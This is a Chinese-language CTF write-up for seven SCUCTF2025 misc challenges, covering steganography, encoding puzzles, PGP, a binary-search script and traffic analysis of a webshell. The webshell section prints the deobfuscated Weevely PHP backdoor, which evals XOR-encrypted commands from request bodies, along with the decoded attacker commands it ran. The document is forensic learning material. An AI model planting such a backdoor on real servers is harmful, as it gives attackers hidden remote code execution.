SCUCTF2025 WriteUp For Misc

题目解题过程#

Misc-二维码的秘密解题步骤：#

文件啥也没有，一眼LSB隐写 StegSolve打开，Blue plane 1通道发现二维码，扫描后得到flag

轻松拿下flag： flag{43ff4dfc6018149aba91dce2efffe64a}

Misc-欢迎来到川大解题步骤：#

打开文件，拖入010editor，发现文件末尾有flag

轻松解出flag: flag{8c79c19629b139fa330d2ae47d44ce7c}

Misc-奇怪的字符解题步骤：#

中文谐音（或无线电术语）对英文字母和数字的转写艾福 => f 艾偶 => l …以此类推轻松解出flag：flag{f5fca0daffb0ebf4b2cd837a53ef1175}

Misc-webshell 解题步骤：#

流量分析题，手边没有WireShark 数据包丢进https://apackets.com/中进行分析，在HTTP请求中发现可疑的php代码

识别出这是工具 Weevely 生成的 webshell 代码中大量使用了 hZ 作为干扰字符，编写代码进行解析

1
i = 'p="PY16bXfpTDNaKhZyiy";fhZuhZhZnctiohZn x($hZt,$k){$c=strlhZen($k);$l=hZstrh'
2
d = 'Zlen($t);$hZhZo="hZ";for(hZ$i=0;$i<$l;){forhZ($hZj=0;(hZhZ$j<$hZc&&$i'
3
g = 'g_match("hZ/hZ$kh(.+)$kf/",@fihZlhZhZehZ_gehZt_contentshZ("php://ihZnp'
4
P = '<$l);$j++hZ,$i++hZ){$hZo.=hZ$t{hZ$i}^hZ$k{$j};}}return $ohZhZ;}if (@prhZe'
5
t = 'asehZ64_enhZcodhZe(@hZx(@gzhZcomprehZss($ohZ),$k)hZ);prhZint("$p$kh$r$kf");}';
6
A = '$k=hZ"9e94b15hZe";$kh=hZ"d312fahZ4223hZ2f";$khZf="d87ahZ55db0hZd39hZ";$hZ'
7
u = 'uthZ"),$m)==1) {hZ@ob_hZstart();@evhZal(@hZgzuncomprehZsshZ(@x(@basehZ64_hZdecod'
8
h = 'e($m[1]hZ),$k)))hZ;$ohZ=@ohZb_gethZ_contents()hZ;hZ@ob_hZend_clean()hZ;$r=@b'
9

10
combined = A + i + d + P + g + u + h + t
11
cleaned_code = combined.replace('hZ', '')
12
print(cleaned_code)

运行结果：

1
$k="9e94b15e";$kh="d312fa42232f";$kf="d87a55db0d39";$p="PY16bXfpTDNaKyiy";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}

将k kh kf字符串拼接得到一串MD5 9e94b15ed312fa42232fd87a55db0d39 进入https://md5.cc/查询得到payload 为 007

在提取出数据包里面被加密的字符串（剩余两张图略）

根据字符串特征和先前代码，编写脚本解密

1
import base64
2
import zlib
3
def xor(data, key):
4
    key_len = len(key)
5
    output = bytearray()
6
    for i in range(len(data)):
7
        output.append(data[i] ^ ord(key[i % key_len]))
8
    return output
9
def decode_payload(payload_b64, key):
10
    encrypted = base64.b64decode(payload_b64)
11
    compressed = xor(encrypted, key)
12
    decrypted = zlib.decompress(compressed)
13
    return decrypted
14
key = "9e94b15e"
15
payloads = [
16
    "Qflyeaz5Yk2XSRd9r+RlShEqaOPWNzUjlWOz",
17
    "QfnqGykd50oWSu77Svj4hOsi3zViuTxs0g==",
18
    "Qflyeaz5Yk2XSRd9r+RlqhAz7oBkMQo4P3s=",
19
    "QfkK4En5HYVzrnB4tRqcTbhVkwZpiQeWazcSwFB7RxaB7wpmEUP1r9lJOTbwIgE=",
20
    "Qflyeaz5Yk2XSRd9r+RlKndJaHypeHmyEswRZbWFM2WtPDCL",
21
    "Qfly/yt9misPVwx7UX2EsYxRjgSxBARRdreMACx95iiMUXaFLod5UI1Rc56H0zdlJ6I1JA=="
22
]
23
for i, p in enumerate(payloads):
24
    result = decode_payload(p, key)
25
    print(result)

得到结果

1
b"echo system('pwd');"
2
b'/var/www/html\n/var/www/html'
3
b"echo system('ls');"
4
b'1.php\nflag.txt\nflag.zip\nindex.html\nshell.php\nshell.php'
5
b"echo system('cat flag.txt');"
6
b'flag{c257f1d9-9786-417b-93af-e97d9c9e192b}\n\n'

不轻松的解出flag: flag{c257f1d9-9786-417b-93af-e97d9c9e192b}

Misc-Anno 解题步骤：#

分析代码，发现是 AES-CBC 加密和LSB隐写的代码编写脚本解密

1
from PIL import Image
2
import numpy as np
3
from Crypto.Cipher import AES
4
from Crypto.Util.Padding import unpad
5
class AES_LSB_Decryptor:
6
    def __init__(self, key):
7
        self.key = key
8
    def extract_data(self, image_path, bits_per_channel=1):
9
        img = Image.open(image_path)
10
        arr = np.array(img)
11
        height, width, channels = arr.shape
12
        bits = []
13
        for y in range(height):
14
            for x in range(width):
15
                for c in range(min(channels, 3)):
16
                    pixel_value = arr[y, x, c]
17
                    val = pixel_value & ((1 << bits_per_channel) - 1)
18
                    bits.append(format(val, f'0{bits_per_channel}b'))
19
        all_bits = "".join(bits)
20
        def bits_to_bytes(bit_str):
21
            byte_arr = bytearray()
22
            for i in range(0, len(bit_str), 8):
23
                byte = bit_str[i:i+8]
24
                if len(byte) < 8: break
25
                byte_arr.append(int(byte, 2))
26
            return bytes(byte_arr)
27

28
        full_data = bits_to_bytes(all_bits)
29
        data_len = int.from_bytes(full_data[:4], 'big')
30
        encrypted_payload = full_data[4 : 4 + data_len]
31
        return encrypted_payload
32

33
    def decrypt_data(self, encrypted_payload):
34
        iv = encrypted_payload[:16]
35
        ciphertext = encrypted_payload[16:]
36
        cipher = AES.new(self.key, AES.MODE_CBC, iv)
37
        decrypted_padded = cipher.decrypt(ciphertext)
38
        return unpad(decrypted_padded, AES.block_size).decode('utf-8')
39

40
def main_decrypt():
41
    STEGO_IMAGE = "C:\\Users\\CodeAtlantis\\Downloads\\task\\stego.png"
42
    AES_KEY = b"0123456789abcdef0123456789abcdef"
43
    decryptor = AES_LSB_Decryptor(key=AES_KEY)
44
    encrypted_data = decryptor.extract_data(STEGO_IMAGE)
45
    secret_message = decryptor.decrypt_data(encrypted_data)
46
    print(f"{secret_message}")
47

48
if __name__ == "__main__":
49
    main_decrypt()

解出flag：flag{7c6ac938-04bc-4127-8bb8-9db4d92f9163}

Misc-pgp 解题步骤#

拿到gpg文件使用pgp5windows工具

轻松解出flag：flag{e56d50da93bb4d7e95a73d83305dac60}

Misc-Algorithm 解题步骤#

二分猜数游戏，编写脚本

1
from pwn import *
2

3
host = 'challenge.qsnctf.com'
4
port = 45991
5

6
r = remote(host, port)
7
low = 1 << 127
8
high = (1 << 128) - 1
9
found = False
10
secret = 0
11

12
print("Starting binary search...")
13

14
for i in range(200):
15
    mid = (low + high) // 2
16
    r.recvuntil(b'Choice: ')
17
    r.sendline(b'1')
18
    r.recvuntil(b'Enter a number: ')
19
    r.sendline(str(mid).encode())
20

21
    result = r.recvline().strip().decode()
22

23
    if result == 'less':
24
        low = mid + 1
25
    elif result == 'greater':
26
        high = mid - 1
27
    elif result == 'equal':
28
        secret = mid
29
        found = True
30
        print(f"Secret found: {secret}")
31
        break
32
    else:
33
        print(f"Unexpected response: {result}")
34
        break
35

36
if found:
37
    r.recvuntil(b'Choice: ')
38
    r.sendline(b'2')
39
    r.recvuntil(b'Enter secret number: ')
40
    r.sendline(str(secret).encode())
41

42
    flag = r.recvall().decode()
43
    print("Flag:", flag.strip())
44
else:
45
    print("Failed to find the secret within the attempts.")
46

47
r.close()

解出flag：flag{8cd598b4380846a1a86698412a9312b1}

音乐

Lovely firefly!

音乐

题目解题过程#

Misc-二维码的秘密解题步骤：#

Misc-欢迎来到川大解题步骤：#

Misc-奇怪的字符解题步骤：#

Misc-webshell 解题步骤：#

Misc-Anno 解题步骤：#

Misc-pgp 解题步骤#

Misc-Algorithm 解题步骤#

文章分享

音乐

目录

音乐

Lovely firefly!

音乐

SCUCTF2025 WriteUp For Misc

题目解题过程#

Misc-二维码的秘密 解题步骤：#

Misc-欢迎来到川大 解题步骤：#

Misc-奇怪的字符 解题步骤：#

Misc-webshell 解题步骤：#

Misc-Anno 解题步骤：#

Misc-pgp 解题步骤#

Misc-Algorithm 解题步骤#

文章分享

音乐

目录

Misc-二维码的秘密解题步骤：#

Misc-欢迎来到川大解题步骤：#

Misc-奇怪的字符解题步骤：#